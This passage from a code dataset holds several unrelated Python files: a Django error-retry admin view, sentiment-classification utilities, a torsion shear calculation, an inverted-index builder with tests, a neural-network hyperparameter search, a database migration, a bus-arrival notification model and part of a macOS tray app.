naturaltime(error.date_next_attempt) if error.has_next_attempt() else next_deploy,\n '{0} / {1}'.format(error.current_attempt, error.total_attempts),\n error.error_type,\n metadata.get('document_type'),\n metadata.get('domain'),\n self.make_checkbox(error)\n ]\n\n def make_search_link(self, error):\n return (\n '{text}'\n ''\n ' '\n ''\n ' '\n ''\n ).format(\n text='{}...'.format(error.doc_id[:5]),\n search_url=reverse(\"global_quick_find\"),\n doc_id=error.doc_id,\n search_title=_(\"Search HQ for this document: %(doc_id)s\") % {'doc_id': error.doc_id},\n raw_url=reverse(\"raw_couch\"),\n raw_title=_(\"Open the raw document: %(doc_id)s\") % {'doc_id': error.doc_id},\n error_url=reverse(EditPillowError.urlname),\n error_id=error.id,\n error_title=_(\"View the details of this error: %(error_id)s\") % {'error_id': error.id}\n )\n\n def make_checkbox(self, error):\n return ''.format(error.id)\n\n\nclass EditPillowError(BasePageView):\n urlname = 'pillow_errors'\n page_title = \"Pillow Error Details\"\n template_name = 'hqpillow_retry/single.html'\n\n @method_decorator(require_superuser)\n def dispatch(self, request, *args, **kwargs):\n return super(EditPillowError, self).dispatch(request, *args, **kwargs)\n\n @property\n def page_context(self):\n error_id = self.request.GET.get('error')\n if not error_id:\n return {}\n\n try:\n error = PillowError.objects.get(id=error_id)\n except PillowError.DoesNotExist:\n raise Http404\n\n return {\n 'error': error\n }\n\n @property\n def page_url(self):\n return reverse(self.urlname)\n\n def post(self, request, *args, **kwargs):\n action = request.POST.get('action')\n source = request.POST.get('source')\n error_ids = []\n prefix = 'PillowError_'\n prefix_len = len(prefix)\n for p in request.POST:\n if p.startswith(prefix):\n error_ids.append(p[prefix_len:])\n\n redirect_url = None\n\n error_list_url = reverse('admin_report_dispatcher', args=('pillow_errors',))\n if not action or action not in ACTIONS:\n messages.error(self.request, _(\"Unknown action: '%(action)s'\") % {'action': action})\n elif not error_ids:\n messages.error(self.request, _(\"No error records specified\"))\n elif action == ACTION_SEND and not len(error_ids) == 1:\n messages.error(self.request, _(\"Only one error may be sent to FogBugs at a time.\"))\n else:\n with transaction.atomic():\n if action == ACTION_DELETE:\n PillowError.objects.filter(id__in=error_ids).delete()\n elif action == ACTION_RESET:\n PillowError.objects.filter(id__in=error_ids).\\\n update(current_attempt=0, date_next_attempt=datetime.utcnow(), queued=False)\n elif action == ACTION_SEND:\n self.bug_report(request.couch_user, error_ids[0])\n\n success = _(\"%(num)s records successfully %(action)s\") % {'num': len(error_ids), 'action': action}\n messages.success(self.request, success)\n\n if source == SOURCE_SINGLE and action == ACTION_DELETE:\n redirect_url = error_list_url\n\n redirect_url = redirect_url or request.META.get('HTTP_REFERER', error_list_url)\n return redirect(redirect_url)\n\n def bug_report(self, couch_user, error_id):\n error = PillowError.objects.get(id=error_id)\n\n context = {\n 'error': error,\n 'url': \"{}{}?error={}\".format(get_url_base(), reverse(EditPillowError.urlname), error_id)\n }\n message = render_to_string('hqpillow_retry/fb.txt', context)\n subject = 'PillowTop error: {} - {}'.format(error.pillow, error.error_type)\n\n reply_to = u'\"{}\" <{}>'.format(couch_user.full_name, couch_user.get_email())\n email = EmailMessage(\n subject=subject,\n body=message,\n to=settings.BUG_REPORT_RECIPIENTS,\n headers={'Reply-To': reply_to}\n )\n\n # only fake the from email if it's an @dimagi.com account\n if re.search('@dimagi\\.com$', couch_user.username):\n email.from_email = couch_user.username\n else:\n email.from_email = settings.CCHQ_BUG_REPORT_EMAIL\n\n email.send(fail_silently=False)\n","sub_path":"corehq/apps/hqpillow_retry/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"361923256","text":"\"\"\"\nsentence2vec : transfer sentences to vectors\nloaddata: load train/test/valid datas\nevaluation_metrics: return scores of (recall_p, recall_n, acc, prc, rc, f1, auc_) \n\"\"\"\nimport numpy as np\nimport torch\nfrom sklearn.metrics import roc_curve, auc, accuracy_score, recall_score, precision_score\nfrom sklearn.metrics import confusion_matrix, average_precision_score\n\nimport sys\nsys.path.append(\"../preprocess/\")\nfrom data_util import word2index, index2word\n\n# 输入一个句子和相应的词典,得到这个句子的向量化表示\n# 向量的尺寸为词典中词汇的个数,i位置上面的数值为第i个单词在sentence中出现的频率\ndef sentence2vec(sentence, dictionary):\n vector = np.zeros(len(dictionary))\n for l in sentence:\n vector[l] += 1\n return(1.0 * vector / len(sentence))\n\ndef loaddata(pos_sentences, neg_sentences, diction):\n \"\"\"\n input: pos_sentences, neg_sentences, diction\n output: train/test/valid texts, train/test/valid labels\n \"\"\"\n # 遍历所有句子,将每一个词映射成编码\n dataset = [] #数据集\n labels = [] #标签\n sentences = [] #原始句子,调试用\n # 处理正向评论\n for sentence in pos_sentences:\n new_sentence = []\n for l in sentence:\n if l in diction:\n new_sentence.append(word2index(l, diction))\n dataset.append(sentence2vec(new_sentence, diction))\n labels.append(0) #正标签为0\n sentences.append(sentence)\n\n # 处理负向评论\n for sentence in neg_sentences:\n new_sentence = []\n for l in sentence:\n if l in diction:\n new_sentence.append(word2index(l, diction))\n dataset.append(sentence2vec(new_sentence, diction))\n labels.append(1) #负标签为1\n sentences.append(sentence)\n\n #打乱所有的数据顺序,形成数据集\n # indices为所有数据下标的一个全排列\n indices = np.random.permutation(len(dataset))\n\n #重新根据打乱的下标生成数据集dataset,标签集labels,以及对应的原始句子sentences\n dataset = [dataset[i] for i in indices]\n labels = [labels[i] for i in indices]\n sentences = [sentences[i] for i in indices]\n\n #对整个数据集进行划分,分为:训练集、校准集和测试集,其中校准和测试集合的长度都是整个数据集的10分之一\n test_size = len(dataset) // 10\n train_data = dataset[2 * test_size :]\n train_label = labels[2 * test_size :]\n\n valid_data = dataset[: test_size]\n valid_label = labels[: test_size]\n\n test_data = dataset[test_size : 2 * test_size]\n test_label = labels[test_size : 2 * test_size]\n\n return (train_data, train_label, test_data, test_label, valid_data, valid_label)\n\ndef evaluation_metrics(y_trues, y_pred_probs):\n fpr, tpr, thresholds = roc_curve(y_true=y_trues, y_score=y_pred_probs, pos_label=1)\n auc_ = auc(fpr, tpr)\n\n y_preds = [1 if p >= 0.5 else 0 for p in y_pred_probs]\n\n acc = accuracy_score(y_true=y_trues, y_pred=y_preds)\n prc = precision_score(y_true=y_trues, y_pred=y_preds)\n rc = recall_score(y_true=y_trues, y_pred=y_preds)\n f1 = 2 * prc * rc / (prc + rc)\n\n \"\"\"\n print('\\n***------------***')\n print('Evaluating AUC, F1, +Recall, -Recall')\n print('Test data size: {}, Incorrect: {}, Correct: {}'.format(len(y_trues), y_trues.count(0), y_trues.count(1)))\n print('Accuracy: %f -- Precision: %f -- +Recall: %f -- F1: %f ' % (acc, prc, rc, f1))\n \"\"\"\n tn, fp, fn, tp = confusion_matrix(y_trues, y_preds).ravel()\n recall_p = tp / (tp + fn)\n recall_n = tn / (tn + fp)\n print('AUC: {:.3f}, +Recall: {:.3f}, -Recall: {:.3f}'.format(auc_, recall_p, recall_n))\n # return , auc_\n\n # print('AP: {}'.format(average_precision_score(y_trues, y_pred_probs)))\n # return recall_p, recall_n, acc, prc, rc, f1, auc_\n return acc, prc, rc, f1, auc_, recall_p, recall_n\n\ndef rightness(predictions, labels):\n \"\"\"计算预测错误率的函数,其中predictions是模型给出的一组预测结果,batch_size行num_classes列的矩阵,labels是数据之中的正确答案\"\"\"\n pred = torch.max(predictions.data, 1)[1] # 对于任意一行(一个样本)的输出值的第1个维度,求最大,得到每一行的最大元素的下标\n rights = pred.eq(labels.data.view_as(pred)).sum() #将下标与labels中包含的类别进行比较,并累计得到比较正确的数量\n return rights, len(labels) #返回正确的数量和这一次一共比较了多少元素","sub_path":"learn/tool.py","file_name":"tool.py","file_ext":"py","file_size_in_byte":4540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"277581555","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Feb 19 09:48:37 2020\n\n@author: Ihab\n\"\"\"\n\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport Deflection as d\nimport Parameters as c\n\n#%%\n\ndef torsion_shear(xloc):\n A1 = 1/2*np.pi*((c.h/2)**2)\n A2 = 1/2*c.h*(c.Ca-c.h/2)\n\n l2 = np.pi * c.h/2\n\n T = d.T_span(xloc)[0]\n c1 = 1/(2*A1*c.G)*(l2/c.tsk + c.h/c.tsp) + 1/(2*A2*c.G)*(c.h/c.tsp)\n c2 = -(1/(2*A1*c.G)*c.h/c.tsp + 1/(2*A2*c.G)*(2*c.lsk/c.tsk + c.h/c.tsp))\n c3 = -1/(2*A1*c.G)*(l2/c.tsk + c.h/c.tsp)\n c4 = 1/(2*A1*c.G)*c.h/c.tsp\n\n # c11 = 1/(2*A1)*(l2/tsk + l1/tsp)\n # c12 = -1/(2*A1)*l1/tsp\n # c21 = -l1/tsp*1/(2*A2)\n # c22 = 1/A2*l3/tsk + l1/tsp*1/(2*A2)\n\n\n mat = np.array([[2*A1, 2*A2, 0], [c1, c2, 0], [c3, c4, 1]])\n sol = np.array([[T],[0],[0]])\n\n# mat = np.array([[c11, c12, -1], [c21, c22, -1],[2*A1, 2*A2, 0]])\n# sol = np.array([[0],[0],[T]])\n\n ans = np.matmul(np.linalg.inv(mat), sol)\n# ans = np.linalg.solve(mat,sol)\n\n J = T/(c.G*ans[2])\n \n return ans[0],ans[1],J\n\n# def torsion_const():\n# return torsion_shear(0.5)[2]\n\n\n\n","sub_path":"Validation/TorsionShear.py","file_name":"TorsionShear.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"55332772","text":"#!/usr/local/bin/python3\nfrom string import punctuation\nfrom nltk.tokenize import word_tokenize\nfrom nltk.stem.porter import *\nfrom nltk.corpus import stopwords\nfrom os import listdir\nfrom sys import argv\nfrom math import ceil\nfrom math import log10\nimport json\n\nREMOVE_STOPWORDS = False\n\n'''\nbinary search to find index of docid in list\nreturns tuple (True/False, index)\n'''\ndef bin_search(docid, lst):\n lo = 0\n hi = len(lst) - 1\n while(lo <= hi):\n mid = ceil((hi + lo) / 2)\n if (lst[mid][0] > docid):\n hi = mid - 1\n elif (lst[mid][0] < docid):\n lo = mid + 1\n else:\n return (True, mid)\n mid = ceil((hi + lo) / 2)\n return (False, mid)\n\n\n'''\nGenerates the posting lists with df and tf for each word with stemming and tokenization\n'''\ndef generate_posting_list(directory):\n DOC_COUNT = 0\n # translator for removing punctuation\n punct_translator = str.maketrans('', '', punctuation)\n\n # store stopwords as a set for fast lookup\n stopwords_set = set(stopwords.words('english'))\n\n # using porter stemmer\n stemmer = PorterStemmer()\n index = {}\n doclen = {}\n for f in sorted(listdir(directory), key=lambda x: int(x.split(\"_\")[1])):\n DOC_COUNT += 1\n docid = int(f.split(\"_\")[1])\n doc = open(directory + \"/\" +f, \"r\")\n\n docText = [w.lower() for w in doc][0].translate(punct_translator)\n docText = [stemmer.stem(w.lower()) for w in word_tokenize(docText)]\n\n # if you don't like data structures turn away\n\n pos = 0\n for word in docText:\n if word in stopwords_set and REMOVE_STOPWORDS:\n pos += 1\n continue\n if word not in index:\n index[word] = {'df':1, 'postings':[(docid,{'tf':1, 'tf-idf':0, 'pos':[pos]})]}\n else:\n doc_index = bin_search(docid, index[word]['postings'])\n # docid in posting list\n if doc_index[0]:\n index[word]['postings'][doc_index[1]][1]['pos'].append(pos)\n index[word]['postings'][doc_index[1]][1]['tf'] += 1\n # docid not in posting list\n else:\n index[word]['postings'].insert(doc_index[1], (docid, {'tf':1,'tf-idf':0, 'pos':[pos]}))\n index[word]['df'] += 1\n pos += 1\n\n doclen[docid] = pos\n\n # Now calculate the tf-idf and update it for every entry in the index\n # This doesnt have a unit test as it is just a math formula, and we would just be testing for order of operations.\n for term in index.keys():\n for docid_index in range(len(index[term]['postings'])):\n index[term]['postings'][docid_index][1]['tf-idf'] = float((1 + log10(index[term]['postings'][docid_index][1]['tf'])) * log10(DOC_COUNT/int(index[term]['df'])))\n\n return (index, DOC_COUNT, doclen)\n\nif __name__ == \"__main__\":\n INDEX_FILENAME = \"index.json\"\n\n # ensure proper calling format\n if len(argv) != 2:\n raise SyntaxError(\"Expected usage ./create_index.py [dir]\")\n\n directory = argv[1]\n \n index = generate_posting_list(directory)\n\n index_file = open(INDEX_FILENAME, 'w')\n index_file.write(json.dumps(index, indent=4))\n\n#---------------UNIT TESTS-----------------\n\n#Tests if our binary search for inserting into the index is working properly\ndef test_bin_search():\n l = [(1, {}), (3, {}), (4, {}), (6, {}), (8, {}), (9, {}), (10, {}), (11, {}), (13, {}), (15, {}), (19, {}), (35, {}), (56, {}), (192, {}), (500, {})]\n assert(bin_search(1, l) == (True, 0))\n assert(bin_search(500, l) == (True, 14))\n assert(bin_search(10, l) == (True, 6))\n assert(bin_search(12, l) == (False, 8))\n\n l = [(1, {})]\n assert(bin_search(1, l) == (True, 0))\n assert(bin_search(2, l) == (False, 1))\n assert(bin_search(0, l) == (False, 0))\n\n l = []\n assert(bin_search(1, l) == (False, 0))\n\t\n#Testing if our lambda function to sort the docs in the corpus works properly\ndef test_lambda_sort():\n l = [\"doc_132_yep\", \"doc_6_Nope\", \"doc_130_helpme\", \"doc_1_plz\"]\n f = sorted(l, key = lambda x: int(x.split(\"_\")[1]))\n assert(f == [\"doc_1_plz\", \"doc_6_Nope\", \"doc_130_helpme\", \"doc_132_yep\"])\n \n#Testing translator for the removal of punctuation\ndef test_punct_remove():\n punct_translator = str.maketrans('', '', punctuation)\n sentence = \"Hello. My name, is! not 'this': I don't think; at least.!?\"\n ts = sentence.translate(punct_translator)\n assert(ts == \"Hello My name is not this I dont think at least\")\n","sub_path":"Assignment_1/create_index.py","file_name":"create_index.py","file_ext":"py","file_size_in_byte":4576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"646051745","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Feb 20 18:02:01 2020\n\n@author: gracehymas\n\n\"\"\"\n\nimport sys\nsys.path.append(\"../\")\nsys.path.append(\"../dataset-and-plotting\")\n\nimport pandas as pd\nimport numpy as np\n\nimport pandas as pd\nimport keras\nfrom keras.layers import Dense\nfrom keras.models import Sequential\nfrom sklearn.preprocessing import scale\n\nfrom nnPlotting import *\n\nfrom hyperopt.pyll import scope\nfrom hyperopt import hp, fmin, tpe, Trials, STATUS_OK, rand\n\n\ndef totalSensitivity(A,B,errorA,errorB):\n totalSensitivity = np.sqrt(A**2 + B**2)\n totalError = np.sqrt(((A*errorA)/np.sqrt(A**2 + B**2))**2 + ((B*errorB)/np.sqrt(A**2 + B**2))**2)\n\n return (totalSensitivity,totalError)\n\nfor nJets in [2,3]:\n\n if nJets == 2:\n variables = ['dRBB','mBB','pTB1', 'pTB2', 'MET','dPhiVBB','dPhiLBmin','Mtop','dYWH', 'mTW', 'pTV', 'MV1cB1_cont', 'MV1cB2_cont', 'nTags', 'nTrackJetsOR']\n\n else:\n variables = ['mBB', 'dRBB', 'pTB1', 'pTB2', 'MET', 'dPhiVBB', 'dPhiLBmin', 'Mtop', 'dYWH', 'mTW', 'pTV', 'mBBJ', 'pTJ3', 'MV1cB1_cont', 'MV1cB2_cont', 'MV1cJ3_cont', 'nTags', 'nTrackJetsOR']\n\n # Read in Data\n if nJets == 2:\n dfEven = pd.read_csv('../dataset-and-plotting/CSV/VHbb_data_2jet_even.csv')\n dfOdd = pd.read_csv('../dataset-and-plotting/CSV/VHbb_data_2jet_odd.csv')\n\n else:\n dfEven = pd.read_csv('../dataset-and-plotting/CSV/VHbb_data_3jet_even.csv')\n dfOdd = pd.read_csv('../dataset-and-plotting/CSV/VHbb_data_3jet_odd.csv')\n \n # Process Even Events\n xEven = scale(dfEven[variables].to_numpy())\n yEven = dfEven['Class'].to_numpy()\n wEven = dfEven['training_weight'].to_numpy()\n\n # Process Odd Events\n xOdd = scale(dfOdd[variables].to_numpy())\n yOdd = dfOdd['Class'].to_numpy()\n wOdd = dfOdd['training_weight'].to_numpy()\n\n # Dictionary of hyperparameters of BDT and possible range of values\n \n hyperparameters = {'epochs': hp.quniform('epochs', 100, 300, 10),\n 'batch_size': hp.quniform(\"batch_size\", 50, 200, 1),\n }\n \n \n \n def DNNClassifier():\n\n model = Sequential()\n\n # Add Layers\n model.add(Dense(units=14, input_shape=(xEven.shape[1],), activation='relu')) # 1st layer\n model.add(Dense(14, init='uniform', activation='relu')) # hidden layer\n model.add(Dense(14, init='uniform', activation='relu')) # hidden layer\n model.add(Dense(1, activation='sigmoid')) # output layer\n model.compile(loss='binary_crossentropy', optimizer='SGD', metrics=['accuracy'])\n return model\n \n # Objective function to be minimised \n def objective_function(hyperparameters):\n modelEven = DNNClassifier()\n \n modelOdd = DNNClassifier()\n \n # Train Model\n modelEven.fit(xEven,\n yEven, \n sample_weight = wEven, \n epochs = int(hyperparameters['epochs']), \n batch_size=int(hyperparameters['batch_size']), \n verbose = 0)\n \n modelOdd.fit(xOdd,\n yOdd, \n sample_weight = wOdd, \n epochs = int(hyperparameters['epochs']), \n batch_size=int(hyperparameters['batch_size']), \n verbose = 0)\n \n ## EVALUATION DNN & Plots\n dfOdd['decision_value'] = modelEven.predict_proba(xOdd)\n dfEven['decision_value'] = modelOdd.predict_proba(xEven)\n df = pd.concat([dfOdd,dfEven])\n \n sensitivity = calc_sensitivity_with_error(df)\n \n # We wish to maximise sensitivity therefore minimise -1*sensitivity \n return {'loss': -1*sensitivity[0], 'status': STATUS_OK}\n\n trials = Trials()\n\n # This function does the optimisation using the objective function and the hyperparameters given\n best = fmin(\n fn=objective_function,\n space=hyperparameters,\n algo=rand.suggest, # Random search/ stochastic\n max_evals=50 # The number of iterations\n )\n\n print(best)\n \n \n","sub_path":"DeepNeuralNetworks/NNOptimisation.py","file_name":"NNOptimisation.py","file_ext":"py","file_size_in_byte":4145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"637464117","text":"\"\"\"ortschaften\n\nRevision ID: 615daca391cd\nRevises: 3ebbb289aa33\nCreate Date: 2020-06-01 23:57:09.422643\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '615daca391cd'\ndown_revision = '3ebbb289aa33'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('ortschaften',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('ort', sa.String(length=200), nullable=True),\n sa.Column('laenge', sa.Float(), nullable=True),\n sa.Column('breite', sa.Float(), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('ortschaften')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/615daca391cd_ortschaften.py","file_name":"615daca391cd_ortschaften.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"125118273","text":"from google.appengine.api import users, mail\nfrom google.appengine.ext import db\nfrom buscall.models import nextbus\nfrom buscall.models.nextbus import get_agency, get_route,get_predictions, get_route\nfrom buscall.models.profile import UserProfile\nfrom buscall.util import DAYS_OF_WEEK, MAIL_SENDER\nfrom buscall.models.twilio import notify_by_phone, notify_by_txt\nfrom buscall.decorators import check_user_payment\nfrom buscall.util import humanize_list\nimport datetime\ntry:\n from itertools import compress\nexcept ImportError:\n from itertools import izip\n def compress(data, selectors):\n return (d for d, s in izip(data, selectors) if s)\n\nNOTIFICATION_CHOICES = (('phone', 'Call'), ('txt', 'Text'), ('email', 'Email'))\n\nclass BusListener(db.Model):\n userprofile = db.ReferenceProperty(UserProfile, collection_name=\"listeners\", required=True)\n\n # info about bus stop\n agency_id = db.StringProperty(required=True, default=\"mbta\")\n route_id = db.StringProperty(required=True)\n direction_id = db.StringProperty(required=False)\n stop_id = db.StringProperty(required=True)\n\n # is this a one-time alert, or a recurring alert?\n recur = db.BooleanProperty(required=True)\n\n # when to start listening\n # App Engine doesn't allow inequality filters on multiple entities\n # (such as time is after start and time is before end)\n # so instead we'll use a boolean to determine whether this needs to be checked\n start = db.TimeProperty(required=True)\n # when all your notifications have been satisfied, set seen=True\n seen = db.BooleanProperty(required=True, default=False)\n\n # day of week: since we'll be sorting by this,\n # it actually makes sense to keep them as separate properties\n mon = db.BooleanProperty(required=True, default=True)\n tue = db.BooleanProperty(required=True, default=True)\n wed = db.BooleanProperty(required=True, default=True)\n thu = db.BooleanProperty(required=True, default=True)\n fri = db.BooleanProperty(required=True, default=True)\n sat = db.BooleanProperty(required=True, default=True)\n sun = db.BooleanProperty(required=True, default=True)\n\n @property\n def daily(self):\n return all((getattr(self, d) for d in DAYS_OF_WEEK))\n\n @property\n def weekdays(self):\n return self.mon and self.tue and self.wed and self.thu and self.fri \\\n and not self.sat and not self.sun\n\n @property\n def weekends(self):\n return self.sat and self.sun \\\n and not self.mon and not self.tue and not self.wed and not self.thu and not self.fri\n\n @property\n def repeat_descriptor(self):\n if self.recur:\n if self.daily:\n return \"every day\"\n if self.weekdays:\n return \"every weekday\"\n if self.weekends:\n return \"every weekend\"\n \n day_names = [day.capitalize() for day in DAYS_OF_WEEK]\n day_vals = [getattr(self, day) for day in DAYS_OF_WEEK]\n if not any(day_vals):\n return \"never\" # should never get here\n return \"every %s\" % (humanize_list(compress(day_names, day_vals)),)\n \n else:\n today = datetime.date.today()\n tomorrow = today + datetime.timedelta(days=1)\n for i, day in enumerate(DAYS_OF_WEEK):\n if getattr(self, day):\n if i == today.weekday():\n return \"today\"\n if i == tomorrow.weekday():\n return \"tomorrow\"\n return \"on %s\" % (day.capitalize())\n return \"never\" # should never get here\n \n @property\n def agency(self):\n return nextbus.get_agency(self.agency_id)\n \n @property\n def route(self):\n if not getattr(self, \"_route\", None):\n self._route = nextbus.get_route(self.agency_id, self.route_id)\n return self._route\n \n @property\n def direction(self):\n if not getattr(self, \"_direction\", None):\n self._direction = nextbus.get_direction(self.agency_id, self.route_id, self.direction_id)\n return self._direction\n \n @property\n def stop(self):\n if not getattr(self, \"_stop\", None):\n self._stop = nextbus.get_stop(self.agency_id, self.route_id, self.direction_id, self.stop_id)\n return self._stop\n \n @property\n def id(self):\n return self.key().id()\n \n def __str__(self):\n values = {}\n for prop in self.properties().keys():\n values[prop] = getattr(self, prop, None)\n for time in [u'start']:\n try:\n values[time] = values[time].time()\n except AttributeError:\n pass\n values[u'class'] = self.__class__.__name__\n values[u'user'] = self.userprofile.user\n values[u'repeat'] = self.repeat_descriptor\n return \"%(class)s for %(user)s: %(agency_id)s %(route_id)s \" \\\n \"%(direction_id)s %(stop_id)s %(start)s %(repeat)s\" \\\n % values\n \n def get_predictions(self):\n \"Use the Nextbus API to get route prediction information.\"\n return nextbus.get_predictions(self.agency_id, self.route_id, self.direction_id, self.stop_id)\n \n def check_notifications(self):\n self.seen = all((notification.executed for notification in self.notifications))\n if self.seen and not self.recur:\n self.delete()\n else:\n self.put()\n \n def delete(self):\n # delete all your associated notifications first\n for notification in self.notifications:\n notification.delete()\n # and then delete yourself\n super(BusListener, self).delete()\n\nclass BusNotification(db.Model):\n listener = db.ReferenceProperty(BusListener, collection_name=\"notifications\", required=True)\n minutes = db.IntegerProperty(required=True)\n medium = db.StringProperty(choices=[k for k,v in NOTIFICATION_CHOICES], required=True)\n executed = db.BooleanProperty(required=True, default=False)\n\n def __str__(self):\n if self.executed:\n status = \"executed\"\n else:\n status = \"not executed\"\n return \"%s for <%s>, %d minutes before via %s, %s\" % \\\n (self.__class__.__name__, self.listener, self.minutes, self.medium, status)\n\n def execute(self, minutes=None):\n \"minutes parameter is the actual prediction time\"\n userprofile = self.listener.userprofile\n if not userprofile.subscribed and userprofile.credits < 1:\n # no money, no notification\n return\n\n if minutes is None:\n minutes = self.minutes\n\n if self.medium == \"email\":\n notify_by_email(self.listener, minutes)\n elif self.medium == \"phone\":\n notify_by_phone(self.listener, minutes)\n elif self.medium == \"txt\":\n notify_by_txt(self.listener, minutes)\n else:\n raise NotImplementedError\n \n self.executed = True\n self.put()\n self.listener.check_notifications()\n\n@check_user_payment\ndef notify_by_email(listener, minutes=None):\n if minutes is None:\n predictions = listener.get_predictions()\n minutes = predictions.buses[0].minutes\n subject = \"ALERT: %s bus, %s\" % (listener.route.title, listener.stop.title)\n body = \"Your bus is coming in %d minutes.\" % (minutes)\n mail.send_mail(sender=MAIL_SENDER,\n to=listener.userprofile.email,\n subject=subject, body=body)\n","sub_path":"buscall/models/listener.py","file_name":"listener.py","file_ext":"py","file_size_in_byte":7546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"88515542","text":"#!/usr/bin/env python\n# coding:utf-8\n\nimport os\nimport sys\n\n# current_path = os.path.dirname(os.path.abspath(__file__))\ncurrent_path = os.path.abspath(\"/Users/he/proj/XX-Net/code/default/launcher\")\n# helper_path = os.path.join(current_path, os.pardir, os.pardir, os.pardir, 'data', 'launcher', 'helper')\n\nif __name__ == \"__main__\":\n python_path = os.path.abspath(os.path.join(current_path, os.pardir, 'python27', '1.0'))\n noarch_lib = os.path.abspath(os.path.join(python_path, 'lib', 'noarch'))\n sys.path.append(noarch_lib)\n osx_lib = os.path.join(python_path, 'lib', 'darwin')\n sys.path.append(osx_lib)\n extra_lib = \"/System/Library/Frameworks/Python.framework/Versions/2.7/Extras/lib/python/PyObjC\"\n sys.path.append(extra_lib)\n\n# import config\n# import module_init\nimport subprocess\nimport webbrowser\n\n# from xlog import getLogger\n# xlog = getLogger(\"launcher\")\n\nimport AppKit\nimport SystemConfiguration\nfrom PyObjCTools import AppHelper\n\n\nclass MacTrayObject(AppKit.NSObject):\n def __init__(self):\n pass\n\n def applicationDidFinishLaunching_(self, notification):\n # setupHelper()\n # loadConfig()\n self.setupUI()\n self.registerObserver()\n\n def setupUI(self):\n self.statusbar = AppKit.NSStatusBar.systemStatusBar()\n self.statusitem = self.statusbar.statusItemWithLength_(\n AppKit.NSSquareStatusItemLength) # NSSquareStatusItemLength #NSVariableStatusItemLength\n\n # Set initial image icon\n icon_path = os.path.join(current_path, \"web_ui\", \"favicon-mac.ico\")\n image = AppKit.NSImage.alloc().initByReferencingFile_(icon_path.decode('utf-8'))\n image.setScalesWhenResized_(True)\n image.setSize_((15, 15))\n self.statusitem.setImage_(image)\n\n # Let it highlight upon clicking\n self.statusitem.setHighlightMode_(1)\n self.statusitem.setToolTip_(\"XX-Net\")\n\n # Get current selected mode\n proxyState = getProxyState(currentService)\n\n # Build a very simple menu\n self.menu = AppKit.NSMenu.alloc().initWithTitle_('XX-Net')\n\n menuitem = AppKit.NSMenuItem.alloc().initWithTitle_action_keyEquivalent_('Disable GAEProxy', 'disableProxy:', '')\n # 设置为选中状态\n menuitem.setState_(AppKit.NSOnState)\n # if proxyState == 'disable':\n # menuitem.setState_(AppKit.NSOnState)\n self.menu.addItem_(menuitem)\n # self.disableGaeProxyMenuItem = menuitem\n\n # Default event\n menuitem = AppKit.NSMenuItem.alloc().initWithTitle_action_keyEquivalent_('Quit', 'windowWillClose:', '')\n self.menu.addItem_(menuitem)\n # Bind it to the status item\n self.statusitem.setMenu_(self.menu)\n\n # Hide dock icon\n AppKit.NSApp.setActivationPolicy_(AppKit.NSApplicationActivationPolicyProhibited)\n\n def updateStatusBarMenu(self):\n self.currentServiceMenuItem.setTitle_(getCurrentServiceMenuItemTitle())\n\n # Remove Tick before All Menu Items\n self.autoGaeProxyMenuItem.setState_(AppKit.NSOffState)\n self.globalGaeProxyMenuItem.setState_(AppKit.NSOffState)\n self.globalXTunnelMenuItem.setState_(AppKit.NSOffState)\n self.globalSmartRouterMenuItem.setState_(AppKit.NSOffState)\n self.disableGaeProxyMenuItem.setState_(AppKit.NSOffState)\n\n # Get current selected mode\n proxyState = getProxyState(currentService)\n\n # Update Tick before Menu Item\n if proxyState == 'pac':\n self.autoGaeProxyMenuItem.setState_(AppKit.NSOnState)\n elif proxyState == 'gae':\n self.globalGaeProxyMenuItem.setState_(AppKit.NSOnState)\n elif proxyState == 'x_tunnel':\n self.globalXTunnelMenuItem.setState_(AppKit.NSOnState)\n elif proxyState == 'smart_router':\n self.globalSmartRouterMenuItem.setState_(AppKit.NSOnState)\n elif proxyState == 'disable':\n self.disableGaeProxyMenuItem.setState_(AppKit.NSOnState)\n\n # Trigger autovalidation\n self.menu.update()\n\n def validateMenuItem_(self, menuItem):\n return currentService or (menuItem != self.autoGaeProxyMenuItem and\n menuItem != self.globalGaeProxyMenuItem and\n menuItem != self.globalXTunnelMenuItem and\n menuItem != self.globalSmartRouterMenuItem and\n menuItem != self.disableGaeProxyMenuItem)\n\n def presentAlert_withTitle_(self, msg, title):\n self.performSelectorOnMainThread_withObject_waitUntilDone_('presentAlertWithInfo:', [title, msg], True)\n return self.alertReturn\n\n def presentAlertWithInfo_(self, info):\n alert = AppKit.NSAlert.alloc().init()\n alert.setMessageText_(info[0])\n alert.setInformativeText_(info[1])\n alert.addButtonWithTitle_(\"OK\")\n alert.addButtonWithTitle_(\"Cancel\")\n self.alertReturn = alert.runModal() == AppKit.NSAlertFirstButtonReturn\n\n def registerObserver(self):\n nc = AppKit.NSWorkspace.sharedWorkspace().notificationCenter()\n nc.addObserver_selector_name_object_(self, 'windowWillClose:', AppKit.NSWorkspaceWillPowerOffNotification, None)\n\n def windowWillClose_(self, notification):\n executeResult = subprocess.check_output(['networksetup', '-listallnetworkservices'])\n services = executeResult.split('\\n')\n services = 